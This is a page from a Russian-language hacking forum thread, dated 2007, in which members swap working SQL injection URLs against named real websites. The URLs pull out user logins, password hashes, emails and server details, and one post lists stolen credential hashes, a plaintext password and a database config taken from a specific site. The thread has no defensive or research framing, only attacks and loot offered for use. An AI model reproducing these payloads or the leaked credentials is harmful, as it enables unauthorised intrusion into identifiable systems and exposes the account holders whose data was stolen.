HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 41 из 1604 « Первая < 31 37 38 39 40 41 42 43 44 45 51911415411041 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #401  
Старый 04.02.2007, 23:44
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию
Цитата:
Сообщение от ice1k  
Ну так то да, но мало ли - может ему не только юзеры нужны
хм...INFORMATION_SCHEMA.TABLES юзал тока поимел какую то херь..типа charatacter set...ща алкоголь из башки выйдет..обдумаю
а по поводу префикса таблиц то пробовал ds_Esir ...промахнулся

P.S понял теперь как INFORMATION_SCHEMA.TABLES читать
Последний раз редактировалось злюка; 05.02.2007 в 08:30..
 
Ответить с цитированием

  #402  
Старый 05.02.2007, 00:51
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию
вот от меня
http://www.murmansport.ru/modules.php?op=modload&name=News&file=article&sid=-865+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+nuke_users/*
похоже что это PHP-Nuke, пробовал колонки которые должны быть ни одной не подобрал или админ сцуко добавил в них префикс))))

еще одна
http://www.advokaty.net/referat.php?id=-5933+union+select+1,AES_DECRYPT(AES_ENCRYPT(email, 0x71),0x71),3,4,5,6,7+from+advokaty/*
Последний раз редактировалось }{0TT@БЬ)Ч; 05.02.2007 в 03:17..
 
Ответить с цитированием

  #403  
Старый 05.02.2007, 17:37
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию
Zhaba.ru
http://zhaba.ru/flash-games.php?page=-1+union+select+1,username,user_password,4,5,6,7,8, 9,user(),11+from+phpbb_users+where+user_id=3/*

Tamizdat.org
http://www.tamizdat.org/article.php?id=99999+union+select+1,2,user,4,5,6,7 ,password,9,10,11,12,13+from+mysql.user/*

AllAboutJazz.com
http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),15,16,17,18,19,20,21,version(),23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,database(),39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,current_date (),73,74,75,76,77/*

Fujirangefinder.com
http://fujirangefinder.com/user.php?id=-1+union+select+1,current_date(),user(),4,user(),ve rsion(),database(),8,9,10,11/*

Fotoforma.ru
http://www.fotoforma.ru/texts.php?ID=-1+union+select+1,2,3,4,5/*

Cineclassic.com
http://www.cineclassic.com/fiche.php?film_id=999+union+select+1,2,3,4,user(), 6,7,database(),9,10,11,version(),13,current_date() ,15,16,17,18,19,20,21,22,23/*
 
Ответить с цитированием

  #404  
Старый 05.02.2007, 20:45
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию
http://blogsforlearning.msu.edu/articles/view.php?id=-1%20union%20select+1,2,3,4,5,6,7,8,9/*

посоветуйте что дальше можно зделать!
 
Ответить с цитированием

  #405  
Старый 05.02.2007, 23:01
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию
Цитата:
Сообщение от злюка  
хм...INFORMATION_SCHEMA.TABLES юзал тока поимел какую то херь..типа charatacter set...ща алкоголь из башки выйдет..обдумаю
а по поводу префикса таблиц то пробовал ds_Esir ...промахнулся

P.S понял теперь как INFORMATION_SCHEMA.TABLES читать
не парься -вот
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,concat(login,char(58),passwd,cha r(58),email)+from+ds_users/*
90 таблиц перебрал блин
 
Ответить с цитированием

  #406  
Старый 05.02.2007, 23:24
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию
Цитата:
Сообщение от Termin@L  
не парься -вот
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,concat(login,char(58),passwd,cha r(58),email)+from+ds_users/*
90 таблиц перебрал блин
а нах переберал? я же выше написал
 
Ответить с цитированием

  #407  
Старый 05.02.2007, 23:26
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию
Пост пропустил)))
http://www.crdf.ru/?id=15'
http://www.pratt.duke.edu/news/?id=-1'
не могу кол-во ст подобрать
 
Ответить с цитированием

  #408  
Старый 06.02.2007, 00:40
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию
Цитата:
Сообщение от Lancellot  
http://blogsforlearning.msu.edu/articles/view.php?id=-1%20union%20select+1,2,3,4,5,6,7,8,9/*
посоветуйте что дальше можно зделать!
Что тут советовать бери и расшифровывай
http://blogsforlearning.msu.edu/articles/view.php?id=-1+union+select+1,2,3,concat(user_login,char(58),us er_pass,char(58),user_email),5,6,7,8,9+from+wp_use rs/*
 
Ответить с цитированием

  #409  
Старый 06.02.2007, 04:06
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию
нашел на 777.biz.ua инъекцию, а потом с огромной помощью c411k и _-[A.M.D]HiM@S-_ была добыта разнообразная инфа.

Код:
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),password),4,version(),6,7,8,9+from+mysql.user
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,concat(user,char(58),password),4,version(),6,7,8,9+from+mysql.user+limit+4,3 
http://777.biz.ua/photo_big.php?id_p=-1686+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7,8,9+from+mysql.user/*
admin:kRX.3VVi1kp0Q
Anna:3uqauoqXBOygw
Lina:GkgDkPlYVkkiM:zaq1qaz
Tina:gpL6.5zhbQLic
Yuve:1EmcyGHTQK5xY
frukt:6fsFeWu7hSTzA
vini:ijZtKQgJtn7JM
luke:BWilMcUu7Zq.Y
bandit:_UWF9hYsfZlVY


хороший кусок конфига

$myCon['user']="frukt";
$myCon['password']="zaq1";
//$myCon['host']="82.144.221.59";
//$myCon['host']="213.186.114.123";
$myCon['host']="localhost";
$myCon['db']="777_db1";

главные базы

lucky\_mychat1
eximstats
horde
leechprotect
lucky\_db1


[+] _-[A.M.D]HiM@S-_
[+] c411k
Последний раз редактировалось Thanat0z; 22.02.2007 в 03:07..
 
Ответить с цитированием

  #410  
Старый 06.02.2007, 15:02
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию
Sklon.ru
http://www.sklon.ru/print.php?p=world-news&m=menu1&l=ru&view=-1+union+select+1,2,3,table_name,5,6,7+from+INFORMA TION_SCHEMA.TABLES+limit+71,72/*

Venus.ru
http://www.venus.ru/news.php?id=-1+union+select+1,2,3,4,user(),6,version(),database (),9,10,11/*

ppkp.ru
http://www.pkpp.ru/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Ezgulik.org
http://www.ezgulik.org/news.php?id=-1+union+select+1,2,version(),user(),5,6/*
 
Ответить с цитированием
Ответ
Страница 41 из 1604 « Первая < 31 37 38 39 40 41 42 43 44 45 51911415411041 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ